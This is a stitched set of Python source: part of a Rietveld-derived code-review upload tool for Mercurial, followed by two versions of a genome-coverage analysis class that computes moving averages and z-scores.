upload_options.email = email
upload_options.host = None
upload_options.verbose = 0
upload_options.description = None
upload_options.description_file = None
upload_options.reviewers = None
upload_options.cc = None
upload_options.message = None
upload_options.issue = None
upload_options.download_base = False
upload_options.revision = None
upload_options.send_mail = False
upload_options.vcs = None
upload_options.server = server
upload_options.save_cookies = True
if testing:
upload_options.save_cookies = False
upload_options.email = "test@example.com"
rpc = None
global releaseBranch
tags = repo.branchtags().keys()
if 'release-branch.r100' in tags:
# NOTE(rsc): This tags.sort is going to get the wrong
# answer when comparing release-branch.r99 with
# release-branch.r100. If we do ten releases a year
# that gives us 4 years before we have to worry about this.
raise hg_util.Abort('tags.sort needs to be fixed for release-branch.r100')
tags.sort()
for t in tags:
if t.startswith('release-branch.'):
releaseBranch = t
#######################################################################
# http://codereview.appspot.com/static/upload.py, heavily edited.
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tool for uploading diffs from a version control system to the codereview app.
Usage summary: upload.py [options] [-- diff_options]
Diff options are passed to the diff command of the underlying system.
Supported version control systems:
Git
Mercurial
Subversion
It is important for Git/Mercurial users to specify a tree/node/branch to diff
against by using the '--rev' option.
"""
# This code is derived from appcfg.py in the App Engine SDK (open source),
# and from ASPN recipe #146306.
import cookielib
import getpass
import logging
import mimetypes
import optparse
import os
import re
import socket
import subprocess
import sys
import urllib
import urllib2
import urlparse
# The md5 module was deprecated in Python 2.5.
try:
from hashlib import md5
except ImportError:
from md5 import md5
try:
import readline
except ImportError:
pass
# The logging verbosity:
# 0: Errors only.
# 1: Status messages.
# 2: Info logs.
# 3: Debug logs.
verbosity = 1
# Max size of patch or base file.
MAX_UPLOAD_SIZE = 900 * 1024
# whitelist for non-binary filetypes which do not start with "text/"
# .mm (Objective-C) shows up as application/x-freemind on my Linux box.
TEXT_MIMETYPES = [
'application/javascript',
'application/x-javascript',
'application/x-freemind'
]
def GetEmail(prompt):
"""Prompts the user for their email address and returns it.
The last used email address is saved to a file and offered up as a suggestion
to the user. If the user presses enter without typing in anything the last
used email address is used. If the user enters a new address, it is saved
for next time we prompt.
"""
last_email_file_name = os.path.expanduser("~/.last_codereview_email_address")
last_email = ""
if os.path.exists(last_email_file_name):
try:
last_email_file = open(last_email_file_name, "r")
last_email = last_email_file.readline().strip("\n")
last_email_file.close()
prompt += " [%s]" % last_email
except IOError, e:
pass
email = raw_input(prompt + ": ").strip()
if email:
try:
last_email_file = open(last_email_file_name, "w")
last_email_file.write(email)
last_email_file.close()
except IOError, e:
pass
else:
email = last_email
return email
def StatusUpdate(msg):
"""Print a status message to stdout.
If 'verbosity' is greater than 0, print the message.
Args:
msg: The string to print.
"""
if verbosity > 0:
print msg
def ErrorExit(msg):
"""Print an error message to stderr and exit."""
print >>sys.stderr, msg
sys.exit(1)
class ClientLoginError(urllib2.HTTPError):
"""Raised to indicate there was an error authenticating with ClientLogin."""
def __init__(self, url, code, msg, headers, args):
urllib2.HTTPError.__init__(self, url, code, msg, headers, None)
self.args = args
self.reason = args["Error"]
class AbstractRpcServer(object):
"""Provides a common interface for a simple RPC server."""
def __init__(self, host, auth_function, host_override=None, extra_headers={}, save_cookies=False):
"""Creates a new HttpRpcServer.
Args:
host: The host to send requests to.
auth_function: A function that takes no arguments and returns an
(email, password) tuple when called. Will be called if authentication
is required.
host_override: The host header to send to the server (defaults to host).
extra_headers: A dict of extra headers to append to every request.
save_cookies: If True, save the authentication cookies to local disk.
If False, use an in-memory cookiejar instead. Subclasses must
implement this functionality. Defaults to False.
"""
self.host = host
self.host_override = host_override
self.auth_function = auth_function
self.authenticated = False
self.extra_headers = extra_headers
self.save_cookies = save_cookies
self.opener = self._GetOpener()
if self.host_override:
logging.info("Server: %s; Host: %s", self.host, self.host_override)
else:
logging.info("Server: %s", self.host)
def _GetOpener(self):
"""Returns an OpenerDirector for making HTTP requests.
Returns:
A urllib2.OpenerDirector object.
"""
raise NotImplementedError()
def _CreateRequest(self, url, data=None):
"""Creates a new urllib request."""
logging.debug("Creating request for: '%s' with payload:\n%s", url, data)
req = urllib2.Request(url, data=data)
if self.host_override:
req.add_header("Host", self.host_override)
for key, value in self.extra_headers.iteritems():
req.add_header(key, value)
return req
def _GetAuthToken(self, email, password):
"""Uses ClientLogin to authenticate the user, returning an auth token.
Args:
email: The user's email address
password: The user's password
Raises:
ClientLoginError: If there was an error authenticating with ClientLogin.
HTTPError: If there was some other form of HTTP error.
Returns:
The authentication token returned by ClientLogin.
"""
account_type = "GOOGLE"
if self.host.endswith(".google.com") and not force_google_account:
# Needed for use inside Google.
account_type = "HOSTED"
req = self._CreateRequest(
url="https://www.google.com/accounts/ClientLogin",
data=urllib.urlencode({
"Email": email,
"Passwd": password,
"service": "ah",
"source": "rietveld-codereview-upload",
"accountType": account_type,
}),
)
try:
response = self.opener.open(req)
response_body = response.read()
response_dict = dict(x.split("=") for x in response_body.split("\n") if x)
return response_dict["Auth"]
except urllib2.HTTPError, e:
if e.code == 403:
body = e.read()
response_dict = dict(x.split("=", 1) for x in body.split("\n") if x)
raise ClientLoginError(req.get_full_url(), e.code, e.msg, e.headers, response_dict)
else:
raise
def _GetAuthCookie(self, auth_token):
"""Fetches authentication cookies for an authentication token.
Args:
auth_token: The authentication token returned by ClientLogin.
Raises:
HTTPError: If there was an error fetching the authentication cookies.
"""
# This is a dummy value to allow us to identify when we're successful.
continue_location = "http://localhost/"
args = {"continue": continue_location, "auth": auth_token}
req = self._CreateRequest("http://%s/_ah/login?%s" % (self.host, urllib.urlencode(args)))
try:
response = self.opener.open(req)
except urllib2.HTTPError, e:
response = e
if (response.code != 302 or
response.info()["location"] != continue_location):
raise urllib2.HTTPError(req.get_full_url(), response.code, response.msg, response.headers, response.fp)
self.authenticated = True
def _Authenticate(self):
"""Authenticates the user.
The authentication process works as follows:
1) We get a username and password from the user
2) We use ClientLogin to obtain an AUTH token for the user
(see http://code.google.com/apis/accounts/AuthForInstalledApps.html).
3) We pass the auth token to /_ah/login on the server to obtain an
authentication cookie. If login was successful, it tries to redirect
us to the URL we provided.
If we attempt to access the upload API without first obtaining an
authentication cookie, it returns a 401 response (or a 302) and
directs us to authenticate ourselves with ClientLogin.
"""
for i in range(3):
credentials = self.auth_function()
try:
auth_token = self._GetAuthToken(credentials[0], credentials[1])
except ClientLoginError, e:
if e.reason == "BadAuthentication":
print >>sys.stderr, "Invalid username or password."
continue
if e.reason == "CaptchaRequired":
print >>sys.stderr, (
"Please go to\n"
"https://www.google.com/accounts/DisplayUnlockCaptcha\n"
"and verify you are a human. Then try again.")
break
if e.reason == "NotVerified":
print >>sys.stderr, "Account not verified."
break
if e.reason == "TermsNotAgreed":
print >>sys.stderr, "User has not agreed to TOS."
break
if e.reason == "AccountDeleted":
print >>sys.stderr, "The user account has been deleted."
break
if e.reason == "AccountDisabled":
print >>sys.stderr, "The user account has been disabled."
break
if e.reason == "ServiceDisabled":
print >>sys.stderr, "The user's access to the service has been disabled."
break
if e.reason == "ServiceUnavailable":
print >>sys.stderr, "The service is not available; try again later."
break
raise
self._GetAuthCookie(auth_token)
return
def Send(self, request_path, payload=None,
content_type="application/octet-stream",
timeout=None,
**kwargs):
"""Sends an RPC and returns the response.
Args:
request_path: The path to send the request to, eg /api/appversion/create.
payload: The body of the request, or None to send an empty request.
content_type: The Content-Type header to use.
timeout: timeout in seconds; default None i.e. no timeout.
(Note: for large requests on OS X, the timeout doesn't work right.)
kwargs: Any keyword arguments are converted into query string parameters.
Returns:
The response body, as a string.
"""
# TODO: Don't require authentication. Let the server say
# whether it is necessary.
if not self.authenticated:
self._Authenticate()
old_timeout = socket.getdefaulttimeout()
socket.setdefaulttimeout(timeout)
try:
tries = 0
while True:
tries += 1
args = dict(kwargs)
url = "http://%s%s" % (self.host, request_path)
if args:
url += "?" + urllib.urlencode(args)
req = self._CreateRequest(url=url, data=payload)
req.add_header("Content-Type", content_type)
try:
f = self.opener.open(req)
response = f.read()
f.close()
return response
except urllib2.HTTPError, e:
if tries > 3:
raise
elif e.code == 401 or e.code == 302:
self._Authenticate()
else:
raise
finally:
socket.setdefaulttimeout(old_timeout)
class HttpRpcServer(AbstractRpcServer):
"""Provides a simplified RPC-style interface for HTTP requests."""
def _Authenticate(self):
"""Save the cookie jar after authentication."""
super(HttpRpcServer, self)._Authenticate()
if self.save_cookies:
StatusUpdate("Saving authentication cookies to %s" % self.cookie_file)
self.cookie_jar.save()
def _GetOpener(self):
"""Returns an OpenerDirector that supports cookies and ignores redirects.
Returns:
A urllib2.OpenerDirector object.
"""
opener = urllib2.OpenerDirector()
opener.add_handler(urllib2.ProxyHandler())
opener.add_handler(urllib2.UnknownHandler())
opener.add_handler(urllib2.HTTPHandler())
opener.add_handler(urllib2.HTTPDefaultErrorHandler())
opener.add_handler(urllib2.HTTPSHandler())
opener.add_handler(urllib2.HTTPErrorProcessor())
if self.save_cookies:
self.cookie_file = os.path.expanduser("~/.codereview_upload_cookies_" + server)
self.cookie_jar = cookielib.MozillaCookieJar(self.cookie_file)
if os.path.exists(self.cookie_file):
try:
self.cookie_jar.load()
self.authenticated = True
StatusUpdate("Loaded authentication cookies from %s" % self.cookie_file)
except (cookielib.LoadError, IOError):
# Failed to load cookies - just ignore them.
pass
else:
# Create an empty cookie file with mode 600
fd = os.open(self.cookie_file, os.O_CREAT, 0600)
os.close(fd)
# Always chmod the cookie file
os.chmod(self.cookie_file, 0600)
else:
# Don't save cookies across runs of update.py.
self.cookie_jar = cookielib.CookieJar()
opener.add_handler(urllib2.HTTPCookieProcessor(self.cookie_jar))
return opener
def GetRpcServer(options):
"""Returns an instance of an AbstractRpcServer.
Returns:
A new AbstractRpcServer, on which RPC calls can be made.
"""
rpc_server_class = HttpRpcServer
def GetUserCredentials():
"""Prompts the user for a username and password."""
# Disable status prints so they don't obscure the password prompt.
global global_status
st = global_status
global_status = None
email = options.email
if email is None:
email = GetEmail("Email (login for uploading to %s)" % options.server)
password = getpass.getpass("Password for %s: " % email)
# Put status back.
global_status = st
return (email, password)
# If this is the dev_appserver, use fake authentication.
host = (options.host or options.server).lower()
if host == "localhost" or host.startswith("localhost:"):
email = options.email
if email is None:
email = "test@example.com"
logging.info("Using debug user %s. Override with --email" % email)
server = rpc_server_class(
options.server,
lambda: (email, "password"),
host_override=options.host,
extra_headers={"Cookie": 'dev_appserver_login="%s:False"' % email},
save_cookies=options.save_cookies)
# Don't try to talk to ClientLogin.
server.authenticated = True
return server
return rpc_server_class(options.server, GetUserCredentials,
host_override=options.host, save_cookies=options.save_cookies)
def EncodeMultipartFormData(fields, files):
"""Encode form fields for multipart/form-data.
Args:
fields: A sequence of (name, value) elements for regular form fields.
files: A sequence of (name, filename, value) elements for data to be
uploaded as files.
Returns:
(content_type, body) ready for httplib.HTTP instance.
Source:
http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/146306
"""
BOUNDARY = '-M-A-G-I-C---B-O-U-N-D-A-R-Y-'
CRLF = '\r\n'
lines = []
for (key, value) in fields:
typecheck(key, str)
typecheck(value, str)
lines.append('--' + BOUNDARY)
lines.append('Content-Disposition: form-data; name="%s"' % key)
lines.append('')
lines.append(value)
for (key, filename, value) in files:
typecheck(key, str)
typecheck(filename, str)
typecheck(value, str)
lines.append('--' + BOUNDARY)
lines.append('Content-Disposition: form-data; name="%s"; filename="%s"' % (key, filename))
lines.append('Content-Type: %s' % GetContentType(filename))
lines.append('')
lines.append(value)
lines.append('--' + BOUNDARY + '--')
lines.append('')
body = CRLF.join(lines)
content_type = 'multipart/form-data; boundary=%s' % BOUNDARY
return content_type, body
def GetContentType(filename):
"""Helper to guess the content-type from the filename."""
return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
# Use a shell for subcommands on Windows to get a PATH search.
use_shell = sys.platform.startswith("win")
def RunShellWithReturnCode(command, print_output=False,
universal_newlines=True, env=os.environ):
"""Executes a command and returns the output from stdout and the return code.
Args:
command: Command to execute.
print_output: If True, the output is printed to stdout.
If False, both stdout and stderr are ignored.
universal_newlines: Use universal_newlines flag (default: True).
Returns:
Tuple (output, return code)
"""
logging.info("Running %s", command)
p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
shell=use_shell, universal_newlines=universal_newlines, env=env)
if print_output:
output_array = []
while True:
line = p.stdout.readline()
if not line:
break
print line.strip("\n")
output_array.append(line)
output = "".join(output_array)
else:
output = p.stdout.read()
p.wait()
errout = p.stderr.read()
if print_output and errout:
print >>sys.stderr, errout
p.stdout.close()
p.stderr.close()
return output, p.returncode
def RunShell(command, silent_ok=False, universal_newlines=True,
print_output=False, env=os.environ):
data, retcode = RunShellWithReturnCode(command, print_output, universal_newlines, env)
if retcode:
ErrorExit("Got error status from %s:\n%s" % (command, data))
if not silent_ok and not data:
ErrorExit("No output from %s" % command)
return data
class VersionControlSystem(object):
"""Abstract base class providing an interface to the VCS."""
def __init__(self, options):
"""Constructor.
Args:
options: Command line options.
"""
self.options = options
def GenerateDiff(self, args):
"""Return the current diff as a string.
Args:
args: Extra arguments to pass to the diff command.
"""
raise NotImplementedError(
"abstract method -- subclass %s must override" % self.__class__)
def GetUnknownFiles(self):
"""Return a list of files unknown to the VCS."""
raise NotImplementedError(
"abstract method -- subclass %s must override" % self.__class__)
def CheckForUnknownFiles(self):
"""Show an "are you sure?" prompt if there are unknown files."""
unknown_files = self.GetUnknownFiles()
if unknown_files:
print "The following files are not added to version control:"
for line in unknown_files:
print line
prompt = "Are you sure to continue?(y/N) "
answer = raw_input(prompt).strip()
if answer != "y":
ErrorExit("User aborted")
def GetBaseFile(self, filename):
"""Get the content of the upstream version of a file.
Returns:
A tuple (base_content, new_content, is_binary, status)
base_content: The contents of the base file.
new_content: For text files, this is empty. For binary files, this is
the contents of the new file, since the diff output won't contain
information to reconstruct the current file.
is_binary: True iff the file is binary.
status: The status of the file.
"""
raise NotImplementedError(
"abstract method -- subclass %s must override" % self.__class__)
def GetBaseFiles(self, diff):
"""Helper that calls GetBase file for each file in the patch.
Returns:
A dictionary that maps from filename to GetBaseFile's tuple. Filenames
are retrieved based on lines that start with "Index:" or
"Property changes on:".
"""
files = {}
for line in diff.splitlines(True):
if line.startswith('Index:') or line.startswith('Property changes on:'):
unused, filename = line.split(':', 1)
# On Windows if a file has property changes its filename uses '\'
# instead of '/'.
filename = to_slash(filename.strip())
files[filename] = self.GetBaseFile(filename)
return files
def UploadBaseFiles(self, issue, rpc_server, patch_list, patchset, options,
files):
"""Uploads the base files (and if necessary, the current ones as well)."""
def UploadFile(filename, file_id, content, is_binary, status, is_base):
"""Uploads a file to the server."""
set_status("uploading " + filename)
file_too_large = False
if is_base:
type = "base"
else:
type = "current"
if len(content) > MAX_UPLOAD_SIZE:
print ("Not uploading the %s file for %s because it's too large." %
(type, filename))
file_too_large = True
content = ""
checksum = md5(content).hexdigest()
if options.verbose > 0 and not file_too_large:
print "Uploading %s file for %s" % (type, filename)
url = "/%d/upload_content/%d/%d" % (int(issue), int(patchset), file_id)
form_fields = [
("filename", filename),
("status", status),
("checksum", checksum),
("is_binary", str(is_binary)),
("is_current", str(not is_base)),
]
if file_too_large:
form_fields.append(("file_too_large", "1"))
if options.email:
form_fields.append(("user", options.email))
ctype, body = EncodeMultipartFormData(form_fields, [("data", filename, content)])
response_body = rpc_server.Send(url, body, content_type=ctype)
if not response_body.startswith("OK"):
StatusUpdate(" --> %s" % response_body)
sys.exit(1)
# Don't want to spawn too many threads, nor do we want to
# hit Rietveld too hard, or it will start serving 500 errors.
# When 8 works, it's no better than 4, and sometimes 8 is
# too many for Rietveld to handle.
MAX_PARALLEL_UPLOADS = 4
sema = threading.BoundedSemaphore(MAX_PARALLEL_UPLOADS)
upload_threads = []
finished_upload_threads = []
class UploadFileThread(threading.Thread):
def __init__(self, args):
threading.Thread.__init__(self)
self.args = args
def run(self):
UploadFile(*self.args)
finished_upload_threads.append(self)
sema.release()
def StartUploadFile(*args):
sema.acquire()
while len(finished_upload_threads) > 0:
t = finished_upload_threads.pop()
upload_threads.remove(t)
t.join()
t = UploadFileThread(args)
upload_threads.append(t)
t.start()
def WaitForUploads():
for t in upload_threads:
t.join()
patches = dict()
[patches.setdefault(v, k) for k, v in patch_list]
for filename in patches.keys():
base_content, new_content, is_binary, status = files[filename]
file_id_str = patches.get(filename)
if file_id_str.find("nobase") != -1:
base_content = None
file_id_str = file_id_str[file_id_str.rfind("_") + 1:]
file_id = int(file_id_str)
if base_content != None:
StartUploadFile(filename, file_id, base_content, is_binary, status, True)
if new_content != None:
StartUploadFile(filename, file_id, new_content, is_binary, status, False)
WaitForUploads()
def IsImage(self, filename):
"""Returns true if the filename has an image extension."""
mimetype = mimetypes.guess_type(filename)[0]
if not mimetype:
return False
return mimetype.startswith("image/")
def IsBinary(self, filename):
"""Returns true if the guessed mimetyped isnt't in text group."""
mimetype = mimetypes.guess_type(filename)[0]
if not mimetype:
return False # e.g. README, "real" binaries usually have an extension
# special case for text files which don't start with text/
if mimetype in TEXT_MIMETYPES:
return False
return not mimetype.startswith("text/")
class FakeMercurialUI(object):
def __init__(self):
self.quiet = True
self.output = ''
def write(self, *args, **opts):
self.output += ' '.join(args)
def copy(self):
return self
def status(self, *args, **opts):
pass
def readconfig(self, *args, **opts):
pass
def expandpath(self, *args, **opts):
return global_ui.expandpath(*args, **opts)
def configitems(self, *args, **opts):
return global_ui.configitems(*args, **opts)
def config(self, *args, **opts):
return global_ui.config(*args, **opts)
use_hg_shell = False # set to True to shell out to hg always; slower
class MercurialVCS(VersionControlSystem):
"""Implementation of the VersionControlSystem interface for Mercurial."""
def __init__(self, options, ui, repo):
super(MercurialVCS, self).__init__(options)
self.ui = ui
self.repo = repo
self.status = None
# Absolute path to repository (we can be in a subdir)
self.repo_dir = os.path.normpath(repo.root)
# Compute the subdir
cwd = os.path.normpath(os.getcwd())
assert cwd.startswith(self.repo_dir)
self.subdir = cwd[len(self.repo_dir):].lstrip(r"\/")
if self.options.revision:
self.base_rev = self.options.revision
else:
mqparent, err = RunShellWithReturnCode(['hg', 'log', '--rev', 'qparent', '--template={node}'])
if not err and mqparent != "":
self.base_rev = mqparent
else:
self.base_rev = RunShell(["hg", "parents", "-q"]).split(':')[1].strip()
def _GetRelPath(self, filename):
"""Get relative path of a file according to the current directory,
given its logical path in the repo."""
assert filename.startswith(self.subdir), (filename, self.subdir)
return filename[len(self.subdir):].lstrip(r"\/")
def GenerateDiff(self, extra_args):
# If no file specified, restrict to the current subdir
extra_args = extra_args or ["."]
cmd = ["hg", "diff", "--git", "-r", self.base_rev] + extra_args
data = RunShell(cmd, silent_ok=True)
svndiff = []
filecount = 0
for line in data.splitlines():
m = re.match("diff --git a/(\S+) b/(\S+)", line)
if m:
# Modify line to make it look like as it comes from svn diff.
# With this modification no changes on the server side are required
# to make upload.py work with Mercurial repos.
# NOTE: for proper handling of moved/copied files, we have to use
# the second filename.
filename = m.group(2)
svndiff.append("Index: %s" % filename)
svndiff.append("=" * 67)
filecount += 1
logging.info(line)
else:
svndiff.append(line)
if not filecount:
ErrorExit("No valid patches found in output from hg diff")
return "\n".join(svndiff) + "\n"
def GetUnknownFiles(self):
"""Return a list of files unknown to the VCS."""
args = []
status = RunShell(["hg", "status", "--rev", self.base_rev, "-u", "."],
silent_ok=True)
unknown_files = []
for line in status.splitlines():
st, fn = line.split(" ", 1)
if st == "?":
unknown_files.append(fn)
return unknown_files
def get_hg_status(self, rev, path):
# We'd like to use 'hg status -C path', but that is buggy
# (see http://mercurial.selenic.com/bts/issue3023).
# Instead, run 'hg status -C' without a path
# and skim the output for the path we want.
if self.status is None:
if use_hg_shell:
out = RunShell(["hg", "status", "-C", "--rev", rev])
else:
fui = FakeMercurialUI()
ret = hg_commands.status(fui, self.repo, *[], **{'rev': [rev], 'copies': True})
if ret:
raise hg_util.Abort(ret)
out = fui.output
self.status = out.splitlines()
for i in range(len(self.status)):
# line is
# A path
# M path
# etc
line = to_slash(self.status[i])
if line[2:] == path:
if i+1 < len(self.status) and self.status[i+1][:2] == ' ':
return self.status[i:i+2]
return self.status[i:i+1]
raise hg_util.Abort("no status for " + path)
def GetBaseFile(self, filename):
set_status("inspecting " + filename)
# "hg status" and "hg cat" both take a path relative to the current subdir
# rather than to the repo root, but "hg diff" has given us the full path
# to the repo root.
base_content = ""
new_content = None
is_binary = False
oldrelpath = relpath = self._GetRelPath(filename)
out = self.get_hg_status(self.base_rev, relpath)
status, what = out[0].split(' ', 1)
if len(out) > 1 and status == "A" and what == relpath:
oldrelpath = out[1].strip()
status = "M"
if ":" in self.base_rev:
base_rev = self.base_rev.split(":", 1)[0]
else:
base_rev = self.base_rev
if status != "A":
if use_hg_shell:
base_content = RunShell(["hg", "cat", "-r", base_rev, oldrelpath], silent_ok=True)
else:
base_content = str(self.repo[base_rev][oldrelpath].data())
is_binary = "\0" in base_content # Mercurial's heuristic
if status != "R":
new_content = open(relpath, "rb").read()
is_binary = is_binary or "\0" in new_content
if is_binary and base_content and use_hg_shell:
# Fetch again without converting newlines
base_content = RunShell(["hg", "cat", "-r", base_rev, oldrelpath],
silent_ok=True, universal_newlines=False)
if not is_binary or not self.IsImage(relpath):
new_content = None
return base_content, new_content, is_binary, status
# NOTE: The SplitPatch function is duplicated in engine.py, keep them in sync.
def SplitPatch(data):
"""Splits a patch into separate pieces for each file.
Args:
data: A string containing the output of svn diff.
Returns:
A list of 2-tuple (filename, text) where text is the svn diff output
pertaining to filename.
"""
patches = []
filename = None
diff = []
for line in data.splitlines(True):
new_filename = None
if line.startswith('Index:'):
unused, new_filename = line.split(':', 1)
new_filename = new_filename.strip()
elif line.startswith('Property changes on:'):
unused, temp_filename = line.split(':', 1)
# When a file is modified, paths use '/' between directories, however
# when a property is modified '\' is used on Windows. Make them the same
# otherwise the file shows up twice.
temp_filename = to_slash(temp_filename.strip())
if temp_filename != filename:
# File has property changes but no modifications, create a new diff.
new_filename = temp_filename
if new_filename:
if filename and diff:
patches.append((filename, ''.join(diff)))
filename = new_filename
diff = [line]
continue
if diff is not None:
diff.append(line)
if filename and diff:
patches.append((filename, ''.join(diff)))
return patches
def UploadSeparatePatches(issue, rpc_server, patchset, data, options):
"""Uploads a separate patch for each file in the diff output.
Returns a list of [patch_key, filename] for each file.
"""
patches = SplitPatch(data)
rv = []
for patch in patches:
set_status("uploading patch for " + patch[0])
if len(patch[1]) > MAX_UPLOAD_SIZE:
print ("Not uploading the patch for " + patch[0] +
" because the file is too large.")
continue
form_fields = [("filename", patch[0])]
if not options.download_base:
form_fields.append(("content_upload", "1"))
files = [("data", "data.diff", patch[1])]
ctype, body = EncodeMultipartFormData(form_fields, files)
url = "/%d/upload_patch/%d" % (int(issue), int(patchset))
print "Uploading patch for " + patch[0]
response_body = rpc_server.Send(url, body, content_type=ctype)
lines = response_body.splitlines()
if not lines or lines[0] != "OK":
StatusUpdate(" --> %s" % response_body)
sys.exit(1)
rv.append([lines[1], patch[0]])
return rv
|
# Import -----------------------------------------------------------------------
import os
import pandas as pd
import numpy as np
from biokit.stats import mixture
# Class ------------------------------------------------------------------------
class Bed_genomecov(object):
""" Create pandas dataframe of bed file provided by bedtools genomecov (-d).
:param input_filename: the input data with results of a bedtools genomecov
run.
"""
def __init__(self, input_filename):
try:
self.df = pd.read_table(input_filename, header=None)
except IOError as e:
print("I/0 error({0}): {1}".format(e.errno, e.strerror))
def __str__(self):
return self.df.__str__()
def moving_average(self, n):
""" Do moving average of reads coverage and create a column called 'ma'
in data frame with results.
:param n: window's size.
"""
ret = np.cumsum(np.array(self.df[2]), dtype=float)
ret[n:] = ret[n:] - ret[:-n]
ma = ret[n - 1:] / n
mid = int(n / 2)
self.df["ma"] = pd.Series(ma, index=np.arange(start=mid,
stop=(len(ma) + mid)))
def coverage_scaling(self):
""" Normalize data with moving average of coverage and create a column
called 'scale' in data frame with results.
Needs result of moving_average().
"""
try:
self.df["scale"] = self.df[2] / self.df["ma"]
except KeyError:
print("Column 'ma' is missing.\n"
"You must run moving_average() function before this.\n\n"
"Usage:\n"
"> mydata = Bed_genomecov('exemple.txt')\n"
"> mydata.moving_average(n=1000)\n"
"> mydata.coverage_scaling()")
return
def _get_best_gaussian(self, results):
diff = 100
for i, value in enumerate(results.mus):
if(abs(value - 1) < diff):
diff = value
indice = i
return indice
def compute_zscore(self, k=2):
""" Compute zscore of coverage.
Needs result of coverage_scaling().
:param k: Number gaussian predicted in mixture (default = 2)
"""
try:
mf = mixture.GaussianMixtureFitting(self.df["scale"].dropna(), k=k)
except KeyError:
print("Column 'scale' is missing in data frame.\n"
"You must run coverage_scaling() function before this.\n\n"
"Usage:\n"
"> mydata = Bed_genomecov('exemple.txt')\n"
"> mydata.moving_average(n=1000)\n"
"> mydata.coverage_scaling()\n"
"> mydata.compute_zscore()")
return
mf.estimate()
self.gaussian = mf.results
i = self._get_best_gaussian(mf.results)
self.df["zscore"] = (self.df["scale"] - mf.results["mus"][i]) / \
mf.results["sigmas"][i]
def get_low_coverage(self, threshold=-3):
"""Keep position with zscore lower than INT and return a data frame.
:param threshold: Integer
"""
try:
return self.df.loc[self.df["zscore"] < threshold]
except KeyError:
print("Column 'zscore' is missing in data frame.\n"
"You must run compute_zscore before get low coverage.\n\n"
"Usage:\n"
"> mydata = Bed_genomecov('exemple.txt')\n"
"> mydata.moving_average(n=1000)\n"
"> mydata.coverage_scaling()\n"
"> mydata.compute_zscore(k=2)")
def get_high_coverage(self, threshold=3):
"""Keep position with zscore higher than INT and return a data frame.
:param threshold: Integer
"""
try:
return self.df.loc[self.df["zscore"] > threshold]
except KeyError:
print("Column 'zscore' is missing in data frame.\n"
"You must run compute_zscore before get low coverage.\n\n"
"Usage:\n"
"> mydata = Bed_genomecov('exemple.txt')\n"
"> mydata.moving_average(n=1000)\n"
"> mydata.coverage_scaling()\n"
"> mydata.compute_zscore(k=2)")
Update report_mapping.py
# Import -----------------------------------------------------------------------
import os
import pandas as pd
import numpy as np
from biokit.stats import mixture
# Class ------------------------------------------------------------------------
class Bed_genomecov(object):
""" Create pandas dataframe of bed file provided by bedtools genomecov (-d).
:param input_filename: the input data with results of a bedtools genomecov
run.
"""
def __init__(self, input_filename):
try:
self.df = pd.read_table(input_filename, header=None)
self.df = self.df.rename(columns={0: "chr", 1: "pos", 2: "cov"})
except IOError as e:
print("I/0 error({0}): {1}".format(e.errno, e.strerror))
def __str__(self):
return self.df.__str__()
def moving_average(self, n):
""" Do moving average of reads coverage and create a column called 'ma'
in data frame with results.
:param n: window's size.
"""
ret = np.cumsum(np.array(self.df["cov"]), dtype=float)
ret[n:] = ret[n:] - ret[:-n]
ma = ret[n - 1:] / n
mid = int(n / 2)
self.df["ma"] = pd.Series(ma, index=np.arange(start=mid,
stop=(len(ma) + mid)))
def coverage_scaling(self):
""" Normalize data with moving average of coverage and create a column
called 'scale' in data frame with results.
Needs result of moving_average().
"""
try:
self.df["scale"] = self.df["cov"] / self.df["ma"]
except KeyError:
print("Column 'ma' is missing.\n"
"You must run moving_average() function before this.\n\n"
"Usage:\n"
"> mydata = Bed_genomecov('exemple.txt')\n"
"> mydata.moving_average(n=1000)\n"
"> mydata.coverage_scaling()")
return
def _get_best_gaussian(self, results):
diff = 100
for i, value in enumerate(results.mus):
if(abs(value - 1) < diff):
diff = value
indice = i
return indice
def compute_zscore(self, k=2):
""" Compute zscore of coverage.
Needs result of coverage_scaling().
:param k: Number gaussian predicted in mixture (default = 2)
"""
try:
mf = mixture.GaussianMixtureFitting(self.df["scale"].dropna(), k=k)
except KeyError:
print("Column 'scale' is missing in data frame.\n"
"You must run coverage_scaling() function before this.\n\n"
"Usage:\n"
"> mydata = Bed_genomecov('exemple.txt')\n"
"> mydata.moving_average(n=1000)\n"
"> mydata.coverage_scaling()\n"
"> mydata.compute_zscore()")
return
mf.estimate()
self.gaussian = mf.results
i = self._get_best_gaussian(mf.results)
self.df["zscore"] = (self.df["scale"] - mf.results["mus"][i]) / \
mf.results["sigmas"][i]
def get_low_coverage(self, threshold=-3):
"""Keep position with zscore lower than INT and return a data frame.
:param threshold: Integer
"""
try:
return self.df.loc[self.df["zscore"] < threshold]
except KeyError:
print("Column 'zscore' is missing in data frame.\n"
"You must run compute_zscore before get low coverage.\n\n"
"Usage:\n"
"> mydata = Bed_genomecov('exemple.txt')\n"
"> mydata.moving_average(n=1000)\n"
"> mydata.coverage_scaling()\n"
"> mydata.compute_zscore(k=2)")
def get_high_coverage(self, threshold=3):
"""Keep position with zscore higher than INT and return a data frame.
:param threshold: Integer
"""
try:
return self.df.loc[self.df["zscore"] > threshold]
except KeyError:
print("Column 'zscore' is missing in data frame.\n"
"You must run compute_zscore before get low coverage.\n\n"
"Usage:\n"
"> mydata = Bed_genomecov('exemple.txt')\n"
"> mydata.moving_average(n=1000)\n"
"> mydata.coverage_scaling()\n"
"> mydata.compute_zscore(k=2)")
if __name__ == "__main__":
mydata = Bed_genomecov("~/Documents/pasteur/py_dev/mapping_stats/output.txt")
mydata.moving_average(n=30001)
mydata.coverage_scaling()
mydata.compute_zscore(k=2)
plot(mydata.df["pos"], mydata.df["cov"], label="coverage")
mydata.moving_average(n=1001)
plot(mydata.df["pos"], mydata.df["ma"], label="w1001")
mydata.moving_average(n=2001)
plot(mydata.df["pos"], mydata.df["ma"], label="w2001")
mydata.moving_average(n=5001)
plot(mydata.df["pos"], mydata.df["ma"], label="w5001")
